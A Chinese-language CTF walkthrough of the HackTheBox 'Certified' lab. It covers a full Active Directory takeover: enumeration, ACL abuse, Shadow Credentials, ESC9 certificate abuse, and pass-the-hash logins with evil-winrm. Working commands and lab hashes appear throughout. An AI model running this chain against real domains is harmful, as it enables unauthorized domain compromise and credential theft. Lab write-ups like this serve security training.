HTB-Certified 域渗透实战教学文档<\/h1>

初始信息<\/h2>
目标机器：DC01.certified.htb (10.10.11.41)<\/li>
初始凭据：
用户名：judith.mader<\/li>
密码：judith09<\/li> <\/ul> <\/li> <\/ul>
信息收集阶段<\/h2>

端口扫描<\/h3>
sudo nmap -sT --min-rate 10000<\/span> -p- 10.10.11.41 -oA nmapscan\/port
<\/span><\/span>grep open nmapscan\/port.nmap | awk -F'\/'<\/span> '{print $1}'<\/span> | paste -sd,
<\/span><\/span>nmap -sTVC -O -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49668,49673,49674,49683,49713,49737,62702 10.10.11.41
<\/span><\/span><\/code><\/pre>域名解析配置<\/h3>
echo "10.10.11.41 DC01.certified.htb certified.htb"<\/span> > \/etc\/hosts
<\/span><\/span><\/code><\/pre>SMB服务枚举<\/h3>
smbclient -NL 10.10.11.41
<\/span><\/span>crackmapexec smb 10.10.11.41 -u judith.mader -p 'judith09'<\/span> --shares
<\/span><\/span><\/code><\/pre>RID暴力破解获取用户列表<\/h3>
crackmapexec smb 10.10.11.41 -u judith.mader -p 'judith09'<\/span> --rid-brute | grep 'SidTypeUser'<\/span>
<\/span><\/span><\/code><\/pre>获取到的用户列表：<\/p>

Administrator<\/li>
Guest<\/li>
krbtgt<\/li>
DC01$<\/li>
judith.mader<\/li>
management_svc<\/li>
ca_operator<\/li>
alexander.huges<\/li>
harry.wilson<\/li>
gregory.cameron<\/li>
<\/ul>
AS-REPRoasting攻击尝试<\/h3>
impacket-GetNPUsers -dc-ip 10.10.11.41 -no-pass -request -usersfile user_list certified.htb\/
<\/span><\/span><\/code><\/pre>BloodHound信息收集与分析<\/h2>
bloodhound-python -c All -u judith.mader -p judith09 -ns 10.10.11.41 -d certified.htb -dc dc01.certified.htb --zip
<\/span><\/span><\/code><\/pre>分析结果：<\/p>

judith.mader对management组有WriteOwner权限<\/li>
management组对management_svc用户有GenericWrite权限<\/li>
management_svc用户对ca_operator用户有GenericAll权限<\/li>
<\/ul>
权限提升路径<\/h2>
1. 获取management组控制权<\/h3>
# 更改management组的所有者为judith.mader<\/span>
<\/span><\/span>bloodyAD --host dc01.certified.htb -d certified.htb -u judith.mader -p 'judith09'<\/span> set owner management judith.mader
<\/span><\/span>
<\/span><\/span># 检查WriteMembers权限<\/span>
<\/span><\/span>impacket-dacledit -action read -rights WriteMembers -principal 'judith.mader'<\/span> -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB'<\/span> -dc-ip 10.10.11.41 "certified.htb\/judith.mader:judith09"<\/span>
<\/span><\/span>
<\/span><\/span># 添加WriteMembers权限<\/span>
<\/span><\/span>impacket-dacledit -action write -rights WriteMembers -principal 'judith.mader'<\/span> -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB'<\/span> -dc-ip 10.10.11.41 "certified.htb\/judith.mader:judith09"<\/span>
<\/span><\/span>
<\/span><\/span># 将judith.mader加入management组<\/span>
<\/span><\/span>bloodyAD --host dc01.certified.htb -d certified.htb -u judith.mader -p 'judith09'<\/span> add groupMember 'management'<\/span> 'judith.mader'<\/span>
<\/span><\/span><\/code><\/pre>2. 利用Shadow Credentials获取management_svc的hash<\/h3>
# 使用pywhisker添加影子凭证<\/span>
<\/span><\/span>python pywhisker.py -d "certified.htb"<\/span> -u "judith.mader"<\/span> -p judith09 --target management_svc --action add
<\/span><\/span>
<\/span><\/span># 使用PKINITtools获取TGT<\/span>
<\/span><\/span>python gettgtpkinit.py -cert-pfx t0cZeyin.pfx -pfx-pass Ryk4iT9K3g7uEgqSfFG1 certified.htb\/management_svc management_svc.ccache
<\/span><\/span>
<\/span><\/span># 设置环境变量<\/span>
<\/span><\/span>export KRB5CCNAME=<\/span>management_svc.ccache
<\/span><\/span>
<\/span><\/span># 获取NTLM hash<\/span>
<\/span><\/span>python getnthash.py -key 3bff551f32ba6bc443866ce6a16d3d3c548785c40735c30d42a756824bb4c5ca certified.htb\/management_svc
<\/span><\/span><\/code><\/pre>获取到的management_svc的NTLM hash: a091c1832bcdd4677c28b5a6a1295584<\/code><\/p>
3. 使用evil-winrm连接<\/h3>
evil-winrm -i dc01.certified.htb -u management_svc -H 'a091c1832bcdd4677c28b5a6a1295584'<\/span>
<\/span><\/span><\/code><\/pre>进一步权限提升<\/h2>
1. AD证书枚举<\/h3>
certipy-ad find -u judith.mader@certified.htb -p judith09 -dc-ip 10.10.11.41
<\/span><\/span><\/code><\/pre>发现存在"No Security Extension"漏洞（ESC9）<\/p>
2. 利用ESC9漏洞<\/h3>
# 修改ca_operator的密码<\/span>
<\/span><\/span>net user ca_operator redteam \/DOMAIN
<\/span><\/span>
<\/span><\/span># 更改ca_operator的userPrincipalName为Administrator<\/span>
<\/span><\/span>certipy-ad account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator
<\/span><\/span>
<\/span><\/span># 请求易受攻击的证书模板<\/span>
<\/span><\/span>certipy-ad req -username ca_operator@certified.htb -p redteam -ca certified-DC01-CA -template CertifiedAuthentication -debug
<\/span><\/span>
<\/span><\/span># 使用证书进行身份验证获取Administrator的NT哈希<\/span>
<\/span><\/span>certipy-ad auth -pfx administrator.pfx -username administrator -domain certified.htb
<\/span><\/span><\/code><\/pre>获取到的Administrator的NTLM hash: 0d5b49608bbce1751f708748f67e2d34<\/code><\/p>
3. 使用evil-winrm以Administrator身份连接<\/h3>
evil-winrm -i dc01.certified.htb -u administrator -H '0d5b49608bbce1751f708748f67e2d34'<\/span>
<\/span><\/span><\/code><\/pre>关键知识点总结<\/h2>


ACL滥用<\/strong>：<\/p>

WriteOwner权限允许更改对象的所有者<\/li>
WriteMembers权限允许修改组成员<\/li>
GenericWrite权限允许修改对象属性<\/li>
<\/ul>
<\/li>

Shadow Credentials攻击<\/strong>：<\/p>

需要目标系统为Windows Server 2016以上<\/li>
需要写入目标对象的msDS-KeyCredentialLink属性权限<\/li>
使用pywhisker工具添加影子凭证<\/li>
使用PKINITtools获取TGT和NTLM hash<\/li>
<\/ul>
<\/li>

AD CS攻击(ESC9)<\/strong>：<\/p>

利用"No Security Extension"漏洞<\/li>
需要控制对证书模板有权限的账户<\/li>
使用certipy-ad工具进行证书请求和认证<\/li>
<\/ul>
<\/li>

工具链<\/strong>：<\/p>

bloodyAD: 用于AD对象操作<\/li>
impacket-dacledit: 用于ACL编辑<\/li>
pywhisker: 用于影子凭证攻击<\/li>
PKINITtools: 用于基于证书的Kerberos认证<\/li>
certipy-ad: 用于AD CS攻击<\/li>
evil-winrm: 用于远程连接Windows主机<\/li>
<\/ul>
<\/li>
<\/ol>